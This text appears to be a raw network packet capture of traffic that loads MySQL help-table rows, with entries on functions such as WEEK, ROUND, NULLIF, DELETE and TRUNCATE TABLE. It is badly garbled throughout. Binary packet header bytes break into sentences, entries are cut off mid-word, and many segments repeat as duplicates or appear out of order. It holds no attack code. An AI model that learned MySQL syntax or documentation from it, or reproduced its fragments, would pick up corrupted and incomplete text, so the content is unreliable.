if one or more operands are 0,\notherwise NULL is returned.\n','mysql> SELECT 1 && 1;\n -> 1\nmysql> SELECT 1 && 0;\n -> 0\nmysql> SELECT 1 && NULL;\n -> NULL\nmysql> SELECT 0 && NULL;\n -> 0\nmysql> SELECT NULL && 0;\n -> 0',''),(250,'X',16,' X(p)\nReturns the X-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT X(GeomFromText(\'PoinCPbb0`BiET@/Ԁo0SE<*@@  3P6rb   )t arguments or FLOAT(p) (where p is in the range from\n25 to 53) stands for a double-precision floating-point number. A\nsingle-precision floating-point number is accurate to approximately 7 decimal\nplaces; a double-precision floating-point number is accurate to approximately 15\ndecimal places.\n\n DOUBLE PRECISION[(M,D)] [UNSIGNED] [ZEROFILL]\n REAL[(M,D)] [UNSIGNED] [ZEROFILL]\n\nThese are synonyms for DOUBLE.\nException: If the server SQL mode includes the REAL_AS_FLOAT option,\nREAL is a synonym for FLOAT rather than DOUBLE.\n','',''),(248,'TIME',1,' TIME\n\nA time. The range is \'-838:59:59\' to \'838:59:59\'.\nMySQL displays TIME values in \'HH:MM:SS\' format, but\nallows you to assign values to TIME columns using either strings or\nnumbers.\n','',''),(249,'&&',20,' AND\n &&\nLogical AND.\nEvaluates to 1 if all operands are non-zero and not NULL,\nto 0 if one or more operands are 0,\notherwise NULL is returned.\n','mysql> SELECT 1 && 1;\n -> 1\nmysql> SELECT 1 && 0;\n -> 0\nmysql> SELECT 1 && NULL;\n -> NULL\nmysql> SELECT 0 && NULL;\n -> 0\nmysql> SELECT NULL && 0;\n -> 0',''),(250,'X',16,' X(p)\nReturns the X-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT X(GeomFromText(\'PoinC0QBi0`E@/Ϙ˃2o0E?@?$;  P֞%g U| mmcystem variables].\n\nThe following table describes how the mode argument works:\n\n First day \n Mode of week Range Week 1 is the first week...\n 0 Sunday 0-53 with a Sunday in this year\n 1 Monday 0-53 with more than 3 days this year\n 2 Sunday 1-53 with a Sunday in this year\n 3 Monday 1-53 with more than 3 days this year\n 4 Sunday 0-53 with more than 3 days this year\n 5 Monday 0-53 with a Monday in this year\n 6 Sunday 1-53 with more than 3 days this year\n 7 Monday 1-53 with a Monday in this year\n \n\nA mode value of 3 can be used as of MySQL 4.0.5.\nValues of 4 and above can be used as of MySQL 4.0.17.\n','mysql> SELECT WEEK(\'1998-02-20\');\n -> 7\nmysql> SELECT WEEK(\'1998-02-20\',0);\n -> 7\nmysql> SELECT WEEK(\'1998-02-20\',1);\n -> 8\n C:QZZBi0`EL@/܂Sŀo0E48@? 3 8P tn! ).y៌CSQ0`BiE@/o0AE?@@#;  P֞%g U| mmcystem variables].\n\nThe following table describes how the mode argument works:\n\n First day \n Mode of week Range Week 1 is the first week...\n 0 Sunday 0-53 with a Sunday in this year\n 1 Monday 0-53 with more than 3 days this year\n 2 Sunday 1-53 with a Sunday in this year\n 3 Monday 1-53 with more than 3 days this year\n 4 Sunday 0-53 with more than 3 days this year\n 5 Monday 0-53 with a Monday in this year\n 6 Sunday 1-53 with more than 3 days this year\n 7 Monday 1-53 with a Monday in this year\n \n\nA mode value of 3 can be used as of MySQL 4.0.5.\nValues of 4 and above can be used as of MySQL 4.0.17.\n','mysql> SELECT WEEK(\'1998-02-20\');\n -> 7\nmysql> SELECT WEEK(\'1998-02-20\',0);\n -> 7\nmysql> SELECT WEEK(\'1998-02-20\',1);\n -> 8\n CeQZZ0`BiEL@/Eo0lE48@@ 3 8P tn! ).y៌CUbbBi0`ET@/p܂Ao0E<*@?  3P;zb   )t(56.7 53.34)\'));\n+--------------------------------------+\n| X(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 56.7 |\n+--------------------------------------+',''),(251,'FOUND_ROWS',25,'\nA SELECT statement may include a LIMIT clause to restrict the\nnumber of rows the server returns to the client.\nIn some cases, it is desirable to know how many rows the statement would have\nreturned without the LIMIT, but without running the statement again.\nTo get this row count, include a SQL_CALC_FOUND_ROWS option in the\nSELECT statement, then invoke FOUND_ROWS() afterward:\n','mysql> SELECT SQL_CALC_FOUND_ROWS * FROM tbl_name\n -> WHERE id > 100 LIMIT 10;\nmysql> SELECT FOUND_ROWS();',''),(252,'SYSTEM_USER',25,' SYSTEM_USER()\n\nSYSTEM_USER() is a synonym for USER().\n','',''),(253,'CROSSES',11,' Crosses(g1,g2)\nReturns 1 if g1 spatially crosses g2.\nReturns NULL if g1 is a Polygon or a MultiPolygon,\nor if g2 is a Point or a MultiPoint.\nOtherwise, returns 0.\n\nThe term /spatially crosses/ denotes a spatial relation between two given\ngeometries that has the following properties:\n\n\n --- The two geometries intersect\n\n --- Their intersection results in a geometry that has\na dimension that is C"UZZBi0`EL@/uAo0E49o@?  3Pb1f( 9  )C)UZZBi0`EL@/܂Sŀo0E4@? 3 P{"l;R ).lC@Ubb0`BiET@/Ԁo0SE<*@@  3P;zb   )t(56.7 53.34)\'));\n+--------------------------------------+\n| X(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 56.7 |\n+--------------------------------------+',''),(251,'FOUND_ROWS',25,'\nA SELECT statement may include a LIMIT clause to restrict the\nnumber of rows the server returns to the client.\nIn some cases, it is desirable to know how many rows the statement would have\nreturned without the LIMIT, but without running the statement again.\nTo get this row count, include a SQL_CALC_FOUND_ROWS option in the\nSELECT statement, then invoke FOUND_ROWS() afterward:\n','mysql> SELECT SQL_CALC_FOUND_ROWS * FROM tbl_name\n -> WHERE id > 100 LIMIT 10;\nmysql> SELECT FOUND_ROWS();',''),(252,'SYSTEM_USER',25,' SYSTEM_USER()\n\nSYSTEM_USER() is a synonym for USER().\n','',''),(253,'CROSSES',11,' Crosses(g1,g2)\nReturns 1 if g1 spatially crosses g2.\nReturns NULL if g1 is a Polygon or a MultiPolygon,\nor if g2 is a Point or a MultiPoint.\nOtherwise, returns 0.\n\nThe term /spatially crosses/ denotes a spatial relation between two given\ngeometries that has the following properties:\n\n\n --- The two geometries intersect\n\n --- Their intersection results in a geometry that has\na dimension that is CUUZZ0`BiEL@/܀o0SE49o@@  3Pb1f( 9  )CgUZZ0`BiEL@/go0AE4@@ 3 P{"l;R ).lCVZZBi0`EL@/Ao0E4@?s>  P?2B!ZZ d95CVZZ0`BiEL@/!o0pE4@@r>  P?2B!ZZ d95CXbbBi0`ET@/˃2o0E<@@?"  P֞%^g  mpc3000 mysql> SELECT WEEK(\'1998-12-31\',1);\n -> 53',''),(23,'LOCK',10,'LOCK TABLES locks tables for the current thread. If any of the tables\nare locked by other threads, it blocks until all locks can be acquired.\nUNLOCK TABLES releases any locks held by the current thread.\nAll tables that are locked by the current thread are implicitly unlocked\nwhen the thread issues another LOCK TABLES, or when the connection\nto the server is closed.\n\nA table lock protects only against inappropriate reads or writes by other\nclients. The client holding the lock, even a read lock, can perform\ntable-level operations such as DROP TABLE.\n','LOCK TABLES\n tbl_name [AS alias] {READ [LOCAL] | [LOW_PRIORITY] WRITE}\n [, tbl_name [AS alias] {READ [LOCAL] | [LOW_PRIORITY] WRITE}] ...\nUNLOCK TABLES',''),(24,'CHECK',7,'Checks a table or tables for errors. CHECK TABLE works for\nMyISAM and InnoDB tables. For MyISAM tables, the key statistics are updated.\n\nAs of MySQL 5.0.2, CHECK TABLE also can check views for problems, such\nas tables that are referenced in the view definition that no longer exist.\n','CHECK TABLE tbl_name [, tbl_name] ... [option] ...\n\noption = {QUICK | FAST | MEDIUM | EXTENDED | CHANGED}',''),(25,'RESET SLAVE',7,'RESET SLAVE\n\nMakes the slave foCXZZBi0`EL@/܂Sŀo0E4@? 3 P僀"l6I )/lCXffBi0`EX@/ЂSŀo0E@@? 3 P僰"lN )/l sCXbb0`BiET@/o0AE<@@@!  P֞%^g  mpc3000 mysql> SELECT WEEK(\'1998-12-31\',1);\n -> 53',''),(23,'LOCK',10,'LOCK TABLES locks tables for the current thread. If any of the tables\nare locked by other threads, it blocks until all locks can be acquired.\nUNLOCK TABLES releases any locks held by the current thread.\nAll tables that are locked by the current thread are implicitly unlocked\nwhen the thread issues another LOCK TABLES, or when the connection\nto the server is closed.\n\nA table lock protects only against inappropriate reads or writes by other\nclients. The client holding the lock, even a read lock, can perform\ntable-level operations such as DROP TABLE.\n','LOCK TABLES\n tbl_name [AS alias] {READ [LOCAL] | [LOW_PRIORITY] WRITE}\n [, tbl_name [AS alias] {READ [LOCAL] | [LOW_PRIORITY] WRITE}] ...\nUNLOCK TABLES',''),(24,'CHECK',7,'Checks a table or tables for errors. CHECK TABLE works for\nMyISAM and InnoDB tables. For MyISAM tables, the key statistics are updated.\n\nAs of MySQL 5.0.2, CHECK TABLE also can check views for problems, such\nas tables that are referenced in the view definition that no longer exist.\n','CHECK TABLE tbl_name [, tbl_name] ... [option] ...\n\noption = {QUICK | FAST | MEDIUM | EXTENDED | CHANGED}',''),(25,'RESET SLAVE',7,'RESET SLAVE\n\nMakes the slave foCXZZ0`BiEL@/go0AE4@@ 3 P僀"l6I )/lCXff0`BiEX@/g؀o0AE@@@ 3 P僰"lN )/l sCYbbBi0`ET@/p܂Ao0E<<@?U;  3Plu}U f ) -> 0',''),(234,'MBROVERLAPS',8,' MBROverlaps(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 overlap.\n','',''),(235,'SOUNDEX',23,' SOUNDEX(str)\nReturns a soundex string from str. Two strings that sound almost the\nsame should have identical soundex strings. A standard soundex string\nis four characters long, but the SOUNDEX() function returns an\narbitrarily long string. You can use SUBSTRING() on the result to get\na standard soundex string. All non-alphabetic characters are ignored in the\ngiven string. All international alphabetic characters outside the A-Z range\nare treated as vowels.\n','mysql> SELECT SOUNDEX(\'Hello\');\n -> \'H400\'\nmysql> SELECT SOUNDEX(\'Quadratically\');\n -> \'Q36324\'',''),(236,'SHOW MASTER LOGS',6,'SHOW MASTER LOGS\nSHOW BINARY LOGS\n\nLists the binary log files on the server. This statement is used as part of\nthe procedure described in [PURGE MASTER LOGS, , PURGE MASTER LOGS]\nfor determining which logs can be purged.\n\nmysql> SHOW BINARY LOGS;\n+---------------+-----------+\n| Log_name | File_size |\n+---------------+-----------+\n| binlog.000015 | 724935 |\n| binlog.000016 | 733481 |\n+---------------+-----------+\n','',''),(237CZbb0`BiET@/Ԁo0SE<<@@T;  3Plu}U f ) -> 0',''),(234,'MBROVERLAPS',8,' MBROverlaps(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 overlap.\n','',''),(235,'SOUNDEX',23,' SOUNDEX(str)\nReturns a soundex string from str. Two strings that sound almost the\nsame should have identical soundex strings. A standard soundex string\nis four characters long, but the SOUNDEX() function returns an\narbitrarily long string. You can use SUBSTRING() on the result to get\na standard soundex string. All non-alphabetic characters are ignored in the\ngiven string. All international alphabetic characters outside the A-Z range\nare treated as vowels.\n','mysql> SELECT SOUNDEX(\'Hello\');\n -> \'H400\'\nmysql> SELECT SOUNDEX(\'Quadratically\');\n -> \'Q36324\'',''),(236,'SHOW MASTER LOGS',6,'SHOW MASTER LOGS\nSHOW BINARY LOGS\n\nLists the binary log files on the server. This statement is used as part of\nthe procedure described in [PURGE MASTER LOGS, , PURGE MASTER LOGS]\nfor determining which logs can be purged.\n\nmysql> SHOW BINARY LOGS;\n+---------------+-----------+\n| Log_name | File_size |\n+---------------+-----------+\n| binlog.000015 | 724935 |\n| binlog.000016 | 733481 |\n+---------------+-----------+\n','',''),(237CZZZBi0`EL@/Ao0E4@?s<  P?2J!UP d:6C [ZZ0`BiEL@/!o0pE4@@r<  P?2J!UP d:6Ci\bbBi0`ET@/˃2o0E 100;',''),(239,'VARBINARY',1,' VARBINARY(M)\n\nThe VARBINARY type is similar to the VARCHAR type, but stores\nbinary byte strings rather than non-binary character strings.\n\nThis type was added in MySQL 4.1.2.\n','',''),(240,'LOAD INDEX',6,'The LOAD INDEX INTO CACHE statement preloads a table index into the\nkey cache to which it has been assigned by an explicit CACHE INDEX\nstatement, or into the default key cache otherwise. LOAD INDEX INTO\nCACHE is used only for MyISAM tables.\n\nThe IGNORE LEAVES modifier causes only blocks for the non-leaf\nnodes of the index to be preloaded.\n','LOAD INDEX INTO CACHE\n tbl_index_list [, tbl_index_list] ...\n\ntbl_index_list:\n tbl_name\n [[INDEX|KEY] (index_name[, index_Cq_bb0`BiET@/Ԁo0SE<=@@T:  3Ptu}U  ),'MBRTOUCHES',8,' MBRTouches(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 touch.\n','',''),(238,'INSERT SELECT',6,'INSERT [LOW_PRIORITY | HIGH_PRIORITY] [IGNORE]\n [INTO] tbl_name [(col_name,...)]\n SELECT ...\n [ ON DUPLICATE KEY UPDATE col_name=expr, ... ]\n\nWith INSERT ... SELECT, you can quickly insert many rows\ninto a table from one or many tables.\n','INSERT INTO tbl_temp2 (fld_id)\n SELECT tbl_temp1.fld_order_id\n FROM tbl_temp1 WHERE tbl_temp1.fld_order_id > 100;',''),(239,'VARBINARY',1,' VARBINARY(M)\n\nThe VARBINARY type is similar to the VARCHAR type, but stores\nbinary byte strings rather than non-binary character strings.\n\nThis type was added in MySQL 4.1.2.\n','',''),(240,'LOAD INDEX',6,'The LOAD INDEX INTO CACHE statement preloads a table index into the\nkey cache to which it has been assigned by an explicit CACHE INDEX\nstatement, or into the default key cache otherwise. LOAD INDEX INTO\nCACHE is used only for MyISAM tables.\n\nThe IGNORE LEAVES modifier causes only blocks for the non-leaf\nnodes of the index to be preloaded.\n','LOAD INDEX INTO CACHE\n tbl_index_list [, tbl_index_list] ...\n\ntbl_index_list:\n tbl_name\n [[INDEX|KEY] (index_name[, index_C_ZZBi0`EL@/܂Sŀo0E4@? 3 Ps"l0Y )/lC_ZZBi0`EL@/Ao0E4@?s:  P?2R!PG d;6C_ZZ0`BiEL@/go0AE4@@ 3 Ps"l0Y )/lC`ZZ0`BiEL@/!o0pE4@@r:  P?2R!PG d;6CJabbBi0`ET@/˃2o0E SELECT MINUTE(\'98-02-03 10:05:03\');\n -> 5',''),(28,'DAY',14,' DAY(date)\n\nDAY() is a synonym for DAYOFMONTH().\nIt is available as of MySQL 4.1.1.\n','',''),(29,'MID',23,' MID(str,pos,len)\n\nMID(str,pos,len) is a synonym for\nSUBSTRING(str,pos,len).\n','',''),(30,'REPLACE INTO',6,'REPLACE works exactly like INSERT, except that if an old\nrecord in the table has the same value as a new record for a PRIMARY\nKEY or a UNIQUE index, the old record is deleted before the new\nrecord is inserted.\nSee also : [INSERT, ,INSERT].\n\nNote that unless the table has a PRIMARY KEY or UNIQUE index,\nusing a REPLACE statement makes no sense. It becomes equivalent to\nINSERT, because there is no index to be used to determine whether a new\nrow duplicates another.\n\nValues for all columns are taken from the values specified in the\nREPLACE statement. Any missing columns are set to their default\nvalues, just as happens for INSERT. You can\'t refer to values from\nthe current row and use them in the new row. If you use an assignment such\nas SET col_name = col_name + 1, the reference to the\ncolumn name on the right hand side is treated as\nDEFAULT(col_name), so the assignment is equivalent to SET\ncol_name = DEFAULT(col_name) Ceabb0`BiET@/o0AE SELECT MINUTE(\'98-02-03 10:05:03\');\n -> 5',''),(28,'DAY',14,' DAY(date)\n\nDAY() is a synonym for DAYOFMONTH().\nIt is available as of MySQL 4.1.1.\n','',''),(29,'MID',23,' MID(str,pos,len)\n\nMID(str,pos,len) is a synonym for\nSUBSTRING(str,pos,len).\n','',''),(30,'REPLACE INTO',6,'REPLACE works exactly like INSERT, except that if an old\nrecord in the table has the same value as a new record for a PRIMARY\nKEY or a UNIQUE index, the old record is deleted before the new\nrecord is inserted.\nSee also : [INSERT, ,INSERT].\n\nNote that unless the table has a PRIMARY KEY or UNIQUE index,\nusing a REPLACE statement makes no sense. It becomes equivalent to\nINSERT, because there is no index to be used to determine whether a new\nrow duplicates another.\n\nValues for all columns are taken from the values specified in the\nREPLACE statement. Any missing columns are set to their default\nvalues, just as happens for INSERT. You can\'t refer to values from\nthe current row and use them in the new row. If you use an assignment such\nas SET col_name = col_name + 1, the reference to the\ncolumn name on the right hand side is treated as\nDEFAULT(col_name), so the assignment is equivalent to SET\ncol_name = DEFAULT(col_name) CEbbbBi0`ET@/p܂Ao0E<>@?U9  3P$|u}U , )name] ...)]\n [IGNORE LEAVES]',''),(241,'UNION',6,'UNION is used to combine the result from many SELECT\nstatements into one result set. UNION is available from MySQL 4.0.0\non.\n\nSelected columns listed in corresponding positions of each SELECT\nstatement should have the same type. (For example, the first column selected\nby the first statement should have the same type as the first column selected\nby the other statements.) The column names used in\nthe first SELECT statement are used as the column names for the\nresults returned.\n','SELECT ...\nUNION [ALL | DISTINCT]\nSELECT ...\n [UNION [ALL | DISTINCT]\n SELECT ...]',''),(242,'TO_DAYS',14,' TO_DAYS(date)\nGiven a date date, returns a daynumber (the number of days since year\n0).\n','mysql> SELECT TO_DAYS(950501);\n -> 728779\nmysql> SELECT TO_DAYS(\'1997-10-07\');\n -> 729669',''),(243,'NOT REGEXP',23,' expr NOT REGEXP pat\n expr NOT RLIKE pat\n\nThis is the same as NOT (expr REGEXP pat).\n','',''),(244,'NOT IN',26,' expr NOT IN (value,...)\nThis is the same as NOT (expr IN (value,...)).\n','',''),(245,'!',20,' NOT\n !\nLogical NOT.\nEvaluates to 1 if the operand is 0,\nto 0 if the operand is non-zero,\nand NOT NULL returns NULL.\n','mysql> SELECT NOT 10;\n -> 0\nmysql> SCObZZBi0`EL@/Plo0E4V@?*  3P9Z  yH)Cgbbb0`BiET@/Ԁo0SE<>@@T9  3P$|u}U , )name] ...)]\n [IGNORE LEAVES]',''),(241,'UNION',6,'UNION is used to combine the result from many SELECT\nstatements into one result set. UNION is available from MySQL 4.0.0\non.\n\nSelected columns listed in corresponding positions of each SELECT\nstatement should have the same type. (For example, the first column selected\nby the first statement should have the same type as the first column selected\nby the other statements.) The column names used in\nthe first SELECT statement are used as the column names for the\nresults returned.\n','SELECT ...\nUNION [ALL | DISTINCT]\nSELECT ...\n [UNION [ALL | DISTINCT]\n SELECT ...]',''),(242,'TO_DAYS',14,' TO_DAYS(date)\nGiven a date date, returns a daynumber (the number of days since year\n0).\n','mysql> SELECT TO_DAYS(950501);\n -> 728779\nmysql> SELECT TO_DAYS(\'1997-10-07\');\n -> 729669',''),(243,'NOT REGEXP',23,' expr NOT REGEXP pat\n expr NOT RLIKE pat\n\nThis is the same as NOT (expr REGEXP pat).\n','',''),(244,'NOT IN',26,' expr NOT IN (value,...)\nThis is the same as NOT (expr IN (value,...)).\n','',''),(245,'!',20,' NOT\n !\nLogical NOT.\nEvaluates to 1 if the operand is 0,\nto 0 if the operand is non-zero,\nand NOT NULL returns NULL.\n','mysql> SELECT NOT 10;\n -> 0\nmysql> SCybZZ0`BiEL@/܀o0SE4V@@*  3P9Z  yH)C@cZZBi0`EL@/Ao0E4@?s8  P?2Z!K= d=6CYcZZ0`BiEL@/!o0pE4@@r8  P?2Z!K= d=6C3ebbBi0`ET@/˃2o0E 1\nmysql> SELECT NOT NULL;\n -> NULL\nmysql> SELECT ! (1+1);\n -> 0\nmysql> SELECT ! 1+1;\n -> 1',''),(246,'TEXT TYPE',1,' TEXT[(M)]\n\nA TEXT column with a maximum length of 65,535\n(2^16 - 1) characters.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest TEXT type largest\nenough to hold values M characters long.\n','',''),(247,'DOUBLE',1,' DOUBLE[(M,B)] [UNSIGNED] [ZEROFILL]\n\nA normal-size (double-precision) floating-point number. Allowable values are\n-1.7976931348623157E+308 to -2.2250738585072014E-308,\n0, and 2.2250738585072014E-308 to 1.7976931348623157E+308.\nIf UNSIGNED is specified, negative values are disallowed. M is the\ndisplay width and B is the number of bits of precision. DOUBLE\nwithout arguments or FLOAT(p) (where p is in the range from\n25 to 53) stands for a double-precision floating-point number. A\nsingle-precision floating-point number is accurate to approximately 7 decimal\nplaces; a double-precision floating-point number is accurate to approximately 15\ndecimal places.\n\n DOUBLE PRECISION[(M,D)] [UNSIGNED] [ZEROFILL]\n REAL[(M,D)] [UNSIGNED] [ZEROFILL]\n\nThese are synonyms for DOUBLE.\nException: If the server SQL mode includeCfbb0`BiET@/Ԁo0SE 1\nmysql> SELECT NOT NULL;\n -> NULL\nmysql> SELECT ! (1+1);\n -> 0\nmysql> SELECT ! 1+1;\n -> 1',''),(246,'TEXT TYPE',1,' TEXT[(M)]\n\nA TEXT column with a maximum length of 65,535\n(2^16 - 1) characters.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest TEXT type largest\nenough to hold values M characters long.\n','',''),(247,'DOUBLE',1,' DOUBLE[(M,B)] [UNSIGNED] [ZEROFILL]\n\nA normal-size (double-precision) floating-point number. Allowable values are\n-1.7976931348623157E+308 to -2.2250738585072014E-308,\n0, and 2.2250738585072014E-308 to 1.7976931348623157E+308.\nIf UNSIGNED is specified, negative values are disallowed. M is the\ndisplay width and B is the number of bits of precision. DOUBLE\nwithout arguments or FLOAT(p) (where p is in the range from\n25 to 53) stands for a double-precision floating-point number. A\nsingle-precision floating-point number is accurate to approximately 7 decimal\nplaces; a double-precision floating-point number is accurate to approximately 15\ndecimal places.\n\n DOUBLE PRECISION[(M,D)] [UNSIGNED] [ZEROFILL]\n REAL[(M,D)] [UNSIGNED] [ZEROFILL]\n\nThese are synonyms for DOUBLE.\nException: If the server SQL mode includeCibbBi0`ET@/˃2o0E SELECT UUID();\n -> \'6ccd780c-baba-1026-9564-0040f4311e29\'',''),(32,'LINESTRING',2,' LineString(pt1,pt2,...)\nConstructs a WKB LineString value from a number of WKB Point\narguments. If any argument is not a WKB Point, the return value\nis NULL. If the number of Point arguments is less than two,\nthe return value is NULL.\n','',''),(33,'CONNECTION_ID',25,' CONNECTION_ID()\nReturns the connection ID (thread ID) for the connection.\nEvery connection has its own unique ID.\n','mysql> SELECT CONNECTION_ID();\n -> 23786',''),(34,'DELETE',6,'DELETE deletes rows from tbl_name that satisfy the condition\ngiven by where_definition, and returns the number of records deleted.\n\nIf you issue a DELETE statement with no WHERE clause, all\nrows are deleted. A faster way to do this, when you don\'t want to know\nthe number of deleted rows, is to use TRUNCATE TABLE.Cibb0`BiET@/o0AE SELECT UUID();\n -> \'6ccd780c-baba-1026-9564-0040f4311e29\'',''),(32,'LINESTRING',2,' LineString(pt1,pt2,...)\nConstructs a WKB LineString value from a number of WKB Point\narguments. If any argument is not a WKB Point, the return value\nis NULL. If the number of Point arguments is less than two,\nthe return value is NULL.\n','',''),(33,'CONNECTION_ID',25,' CONNECTION_ID()\nReturns the connection ID (thread ID) for the connection.\nEvery connection has its own unique ID.\n','mysql> SELECT CONNECTION_ID();\n -> 23786',''),(34,'DELETE',6,'DELETE deletes rows from tbl_name that satisfy the condition\ngiven by where_definition, and returns the number of records deleted.\n\nIf you issue a DELETE statement with no WHERE clause, all\nrows are deleted. A faster way to do this, when you don\'t want to know\nthe number of deleted rows, is to use TRUNCATE TABLE.C kbbBi0`ET@/p܂Ao0E<@@?U7  3P.u}U ;O ) s the REAL_AS_FLOAT option,\nREAL is a synonym for FLOAT rather than DOUBLE.\n','',''),(248,'TIME',1,' TIME\n\nA time. The range is \'-838:59:59\' to \'838:59:59\'.\nMySQL displays TIME values in \'HH:MM:SS\' format, but\nallows you to assign values to TIME columns using either strings or\nnumbers.\n','',''),(249,'&&',20,' AND\n &&\nLogical AND.\nEvaluates to 1 if all operands are non-zero and not NULL,\nto 0 if one or more operands are 0,\notherwise NULL is returned.\n','mysql> SELECT 1 && 1;\n -> 1\nmysql> SELECT 1 && 0;\n -> 0\nmysql> SELECT 1 && NULL;\n -> NULL\nmysql> SELECT 0 && NULL;\n -> 0\nmysql> SELECT NULL && 0;\n -> 0',''),(250,'X',16,' X(p)\nReturns the X-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT X(GeomFromText(\'Point(56.7 53.34)\'));\n+--------------------------------------+\n| X(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 56.7 |\n+--------------------------------------+',''),(251,'FOUND_ROWS',25,'\nA SELECT statement may include a LIMIT clause to restrict the\nnumber of rows the server returns to the client.\nIn some cases, it is desirable to know how many rows the statement would have\nreturned witCkZZBi0`EL@/܂Sŀo0E4]@?I  sPk$i L 67=w]C#kbb0`BiET@/Ԁo0SE<@@@T7  3P.u}U ;O ) s the REAL_AS_FLOAT option,\nREAL is a synonym for FLOAT rather than DOUBLE.\n','',''),(248,'TIME',1,' TIME\n\nA time. The range is \'-838:59:59\' to \'838:59:59\'.\nMySQL displays TIME values in \'HH:MM:SS\' format, but\nallows you to assign values to TIME columns using either strings or\nnumbers.\n','',''),(249,'&&',20,' AND\n &&\nLogical AND.\nEvaluates to 1 if all operands are non-zero and not NULL,\nto 0 if one or more operands are 0,\notherwise NULL is returned.\n','mysql> SELECT 1 && 1;\n -> 1\nmysql> SELECT 1 && 0;\n -> 0\nmysql> SELECT 1 && NULL;\n -> NULL\nmysql> SELECT 0 && NULL;\n -> 0\nmysql> SELECT NULL && 0;\n -> 0',''),(250,'X',16,' X(p)\nReturns the X-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT X(GeomFromText(\'Point(56.7 53.34)\'));\n+--------------------------------------+\n| X(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 56.7 |\n+--------------------------------------+',''),(251,'FOUND_ROWS',25,'\nA SELECT statement may include a LIMIT clause to restrict the\nnumber of rows the server returns to the client.\nIn some cases, it is desirable to know how many rows the statement would have\nreturned witC0kZZʪBiEL@/o0o0oE4]@@I  sPk$i L 67=w]CmbbBi0`ET@/˃2o0E SELECT ROUND(-1.23);\n -> -1\nmysql> SELECT ROUND(-1.58);\n -> -2\nmysql> SELECT ROUND(1.58);\n -> 2\nmysql> SELECT ROUND(1.298, 1);\n -> 1.3\nmysql> SELECT ROUND(1.298, 0);\n -> 1\nmysql> SELECT ROUND(23.298, -1);\n -> 20',''),(36,'NULLIF',9,' NULLIF(expr1,expr2)\nReturns NULL if expr1 = expr2 is true, else returns expr1.\nThis is the same as CASE WHEN expr1 = expr2 THEN NULL ELSE expr1 END.\n','mysql> SELECT NULLIF(1,1);\n -> NULL\nmysql> SELECT NULLIF(1,2);\n -> 1',''),(37,'STOP SLAVE',7,'STOP SLAVE [thread_type [, thread_type] ... ]\n\nthread_type: IO_THREAD | SQL_THREAD\n\nStops the slave threads.\nSTOP SLAVE requires the SUPER privilege.\n\nLike START SLAVE, as of MySQL 4.0.2, this statement\nmay be used with the IO_THREAD and SQL_THREAD options to name\nthe thread or threads to stop.\n'CnZZBi0`EL@/Ao0E4 @?H  PPZ׀"lX d?^Cnbb0`BiET@/o0AE SELECT ROUND(-1.23);\n -> -1\nmysql> SELECT ROUND(-1.58);\n -> -2\nmysql> SELECT ROUND(1.58);\n -> 2\nmysql> SELECT ROUND(1.298, 1);\n -> 1.3\nmysql> SELECT ROUND(1.298, 0);\n -> 1\nmysql> SELECT ROUND(23.298, -1);\n -> 20',''),(36,'NULLIF',9,' NULLIF(expr1,expr2)\nReturns NULL if expr1 = expr2 is true, else returns expr1.\nThis is the same as CASE WHEN expr1 = expr2 THEN NULL ELSE expr1 END.\n','mysql> SELECT NULLIF(1,1);\n -> NULL\nmysql> SELECT NULLIF(1,2);\n -> 1',''),(37,'STOP SLAVE',7,'STOP SLAVE [thread_type [, thread_type] ... ]\n\nthread_type: IO_THREAD | SQL_THREAD\n\nStops the slave threads.\nSTOP SLAVE requires the SUPER privilege.\n\nLike START SLAVE, as of MySQL 4.0.2, this statement\nmay be used with the IO_THREAD and SQL_THREAD options to name\nthe thread or threads to stop.\n'CnZZ0`BiEL@/o0  E4 @@G  PPZ׀"lX d?^CobbBi0`ET@/p܂Ao0E SELECT SQL_CALC_FOUND_ROWS * FROM tbl_name\n -> WHERE id > 100 LIMIT 10;\nmysql> SELECT FOUND_ROWS();',''),(252,'SYSTEM_USER',25,' SYSTEM_USER()\n\nSYSTEM_USER() is a synonym for USER().\n','',''),(253,'CROSSES',11,' Crosses(g1,g2)\nReturns 1 if g1 spatially crosses g2.\nReturns NULL if g1 is a Polygon or a MultiPolygon,\nor if g2 is a Point or a MultiPoint.\nOtherwise, returns 0.\n\nThe term /spatially crosses/ denotes a spatial relation between two given\ngeometries that has the following properties:\n\n\n --- The two geometries intersect\n\n --- Their intersection results in a geometry that has\na dimension that is one less than the maximum dimension of the two given\ngeometries\n\n --- Their intersection is not equal to either of the two given geometries\n','',''),(254,'TRUNCATE TABLE',6,'TRUNCATE TABLE empties a table completely.\nLogically, this is equivalent to a DELETE statement that deletes all\nrows, but there are practical differences under some circumstances.\n\nFor InnoDB before version 5.0.3, TRUNCATE TABLE is\nmapped to DELETE, so there is no difference. StaCpbb0`BiET@/Ԁo0SE SELECT SQL_CALC_FOUND_ROWS * FROM tbl_name\n -> WHERE id > 100 LIMIT 10;\nmysql> SELECT FOUND_ROWS();',''),(252,'SYSTEM_USER',25,' SYSTEM_USER()\n\nSYSTEM_USER() is a synonym for USER().\n','',''),(253,'CROSSES',11,' Crosses(g1,g2)\nReturns 1 if g1 spatially crosses g2.\nReturns NULL if g1 is a Polygon or a MultiPolygon,\nor if g2 is a Point or a MultiPoint.\nOtherwise, returns 0.\n\nThe term /spatially crosses/ denotes a spatial relation between two given\ngeometries that has the following properties:\n\n\n --- The two geometries intersect\n\n --- Their intersection results in a geometry that has\na dimension that is one less than the maximum dimension of the two given\ngeometries\n\n --- Their intersection is not equal to either of the two given geometries\n','',''),(254,'TRUNCATE TABLE',6,'TRUNCATE TABLE empties a table completely.\nLogically, this is equivalent to a DELETE statement that deletes 